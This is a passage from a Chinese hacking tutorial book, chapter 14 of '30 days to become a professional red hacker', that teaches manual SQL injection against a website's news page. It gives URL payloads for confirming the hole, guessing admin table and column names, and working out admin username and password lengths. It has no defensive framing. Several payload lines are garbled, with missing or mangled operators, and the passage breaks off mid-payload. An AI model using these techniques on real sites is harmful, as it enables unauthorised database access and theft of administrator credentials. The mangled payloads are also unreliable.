30天打造专业红客-第14章

按键盘上方向键 ← 或 → 可快速上下翻页，按键盘上的 Enter 键可回到本书目录页，按键盘上方向键 ↑ 可回到本页顶部！
————未阅读完？加入书签已便下次继续阅读！


如果用户的帐户具有管理员或其他比较高级的权限，攻击者就可能对数据库的表执行各种他想要做的操作，包括添加、删除或更新数据，甚至可能直接删除表。
（对于这里有些名词如果你不太了解，请你翻阅以前的教程）
今天我们来说个很简单的用新闻页面的〃〃&request　漏洞做的注入
在地址栏输入：　
and　1=1　
查看漏洞是否存在；如果存在就正常返回该页；如果没有；则显示错误，继续假设这个站的数据库存在一个admin表　
在地址栏：　
and　0（select　count（*）　from　admin）　
返回页正常；假设成立了。　
下面来猜猜看一下管理员表里面有几个管理员ID：　
and　10）　
猜解错误！不存在　username　这个字段。只要一直改变括号里面的username这个字段；下面给大家几个常用的　
user；users；member；members；userlist；memberlist；userinfo；admin；manager；用户；yonghu　
用户名称字段猜解完成之后继续猜解密码字段　
and　1=（select　count（*）　from　admin　where　len（password）》0）　
password　字段存在！因为密码字段一般都是这个拉；如果不是就试试pass如果还不是就自己想想吧　
我们已经知道了管理员表里面有3个字段　id；user；password。　
id　编号　
user　用户名　
password　密码　
下面继续的就是管理员用户名和密码的猜解了。一个一个来；有点麻烦；最好找个猜解机来　
先猜出长度！　
and　1=（select　count（*）　from　admin　where　len（user）